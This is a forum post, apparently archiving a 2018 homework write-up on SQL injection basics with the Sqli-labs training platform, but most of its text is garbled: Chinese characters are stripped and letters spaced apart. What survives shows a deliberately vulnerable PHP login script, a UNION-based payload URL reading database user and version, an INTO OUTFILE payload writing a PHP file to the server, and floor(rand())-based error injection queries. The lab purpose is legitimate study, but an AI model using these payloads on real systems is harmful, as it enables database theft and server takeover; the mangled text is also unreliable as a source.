搜索

[1075] 2018-06-25_[小东]6月份作业之SQL注入基础-基于Sqli-lab平台

文档创建者:s7ckTeam
浏览次数:39
最后更新:2025-01-16
2018-06-25_[小东]6月份作业之SQL注入基础-基于Sqli-lab平台 [ ] 6 S Q L - S q l i - l a b     C h a B u g   2 0 1 8 - 0 6 - 2 5 S Q L S Q L 6 0 % S Q L W E B S Q L s q l i S Q L 0 x 0 0   S Q L S Q L 使 0 x 0 1   S Q L p a y l o a d ( ) D o w n l o a d 0 x 0 2   S Q L S Q L s q l S Q L S Q L S E L E C T 1 .   S E L E C T   S Q L M Y S Q L   M S S Q L   S Q L S E V E R   A C C E S S . . . S q l i l a b L e s s 1   < ? p h p / / i n c l u d i n g   t h e   M y s q l   c o n n e c t   p a r a m e t e r s . i n c l u d e ( " . . / s q l - c o n n e c t i o n s / s q l - c o n n e c t . p h p " ) ; e r r o r _ r e p o r t i n g ( 0 ) ; i f ( i s s e t ( $ _ G E T [ ' i d ' ] ) ) { $ i d = $ _ G E T [ ' i d ' ] ;       / / i d $ s q l = " S E L E C T   *   F R O M   u s e r s   W H E R E   i d = ' $ i d '   L I M I T   0 , 1 " ;     / / S Q L $ r e s u l t = m y s q l _ q u e r y ( $ s q l ) ; $ r o w   =   m y s q l _ f e t c h _ a r r a y ( $ r e s u l t ) ;         i f ( $ r o w )       / / s q l         {         e c h o   " < f o n t   s i z e = ' 5 '   c o l o r =   ' # 9 9 F F 0 0 ' > " ;         e c h o   ' Y o u r   L o g i n   n a m e : ' .   $ r o w [ ' u s e r n a m e ' ] ;         e c h o   " < b r > " ;         e c h o   ' Y o u r   P a s s w o r d : '   . $ r o w [ ' p a s s w o r d ' ] ;         e c h o   " < / f o n t > " ; S E L E C T U P D A T E I N S E R T
        }         e l s e   / /         {         e c h o   ' < f o n t   c o l o r =   " # F F F F 0 0 " > ' ;         p r i n t _ r ( m y s q l _ e r r o r ( ) ) ;     / / m y s q l 线         e c h o   " < / f o n t > " ;             } }         e l s e   {   e c h o   " P l e a s e   i n p u t   t h e   I D   a s   p a r a m e t e r   w i t h   n u m e r i c   v a l u e " ; }     / / i d ? > 2 . S Q L S Q L S Q L S Q L S Q L ( ) 3 . P a y l o a d h t t p : / / w w w . t e s t . c o m / L e s s - 1 / i n d e x . p h p ? i d = - 1 % 2 7 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 u s e r ( ) , d a t a b a s e ( ) , v e r s i o n ( ) % 2 0 % 2 3 S Q L S Q L S Q L p a y l o a d P y t h o n S Q L 1 .   2 .   c a c h e h t t p : / / w w w . t e s t . c o m / L e s s - 1 / i n d e x . p h p ? i d = - 1 % 2 7 % 2 0 u n i o n % 2 0 s e l e c t   ' < ? p h p   p h p i n f o ( ) ;   ? > '   i n t o   o u t f i l e   ' D : S e r v e r s q l i L e s s - 1 1 . p h p '   % 2 3 ' a n d   1 = 1 a n d   1 = 2 x o r   1 = 1
访 L e s s - 1 1 . p h p 访 h t t p : / / w w w . t e s t . c o m / L e s s - 1 / 1 . p h p 0 X 0 3   S Q L 使 Q Q 0 x 0 4   W o r d h t t p s : / / w w w . l a n z o u s . c o m / i 1 8 w w 4 h h t t p s : / / p a n . b a i d u . c o m / s / 1 _ y N C r K 4 u M m 7 r C N z W I d V t h w 0 x 0 5   M y s q l p h p i n f o 1 0 9 9 7 1 8 6 4 0
# - -   / * . . . * / / * ! . . . * /     / * ! 5 0 s e l e c t * / m y s q l 5 0   s y s t e m _ u s e r ( )     u s e r ( )     c u r r e n t _ u s e r ( )     s e s s i o n _ u s e r ( )         d a t a b a s e ( )     v e r s i o n ( )   M Y S Q L   l o a d _ f i l e ( )   M Y S Q L   @ @ d a t a d i r     @ @ b a s e d i r   M Y S Q L     @ @ v e r s i o n _ c o m p i l e _ o s     W i n d o w s   S e r v e r   2 0 0 3     c o n c a t ( s t r 1 , s t r 2 ) c o n c a t _ w s ( s e p a r a t o r ,   s t r 1 , s t r 2 . . . ) g r o u p _ c o n c a t ( s t r 1 , s t r 2 . . . . . . )     1   e x i s t s ( ) 2   a s c i i ( ) 3   s u b s t r ( ) e x i s t s ( ) e s i s t s   T r u e F a l s e a s c i i ( ) s t r A S C I I s t r 0 s t r N U L L N U L L s u b s t r (   )   s u b s t r ( s t r i n g ,   n u m   s t a r t ,   n u m   l e n g t h )   s t a r t   # 1 s t r i n g   s t a r t l e n g t h s u b s t r ( d a t a b a s e ( ) , 1 , 1 ) ;   x s s x l i m i t   0 , 1 0   0 1   f l o o r ( )   f l o o r ( x ) , F l o o r ( x ) x 1 . s e l e c t   *   f r o m   a d m i n s   w h e r e   i d = 1   a n d   ( s e l e c t   1   f r o m   ( s e l e c t   c o u n t ( * ) , c o n c a t ( u s e r ( ) , f l o o r ( r a n d ( 0 ) * 2 ) ) x   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   x ) a ) ; 2 .   a n d   ( s e l e c t   1   f r o m ( s e l e c t   c o u n t ( * ) , c o n c a t ( ( s e l e c t ( s e l e c t   ( s e l e c t   c o n c a t ( 0 x 7 e , c o u n t ( s c h e m a _ n a m e ) , 0 x 7 e )   f r o m i n f o r m a t i o n _ s c h e m a . s c h e m a t a ) )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s l i m i t   0 , 1 ) , f l o o r ( r a n d ( 0 ) * 2 ) ) x   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p b y   x ) a ) l i m i t   a n d   ( s e l e c t   1   f r o m ( s e l e c t   c o u n t ( * ) , c o n c a t ( ( s e l e c t ( s e l e c t   ( s e l e c t   c o n c a t ( 0 x 7 e ,   s c h e m a _ n a m e ,   0 x 7 e ) f r o m   i n f o r m a t i o n _ s c h e m a . s c h e m a t a   l i m i t   0 , 1 ) )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   l i m i t 0 , 1 ) , f l o o r ( r a n d ( 0 ) * 2 ) ) x   f r o m i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   x ) a )
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理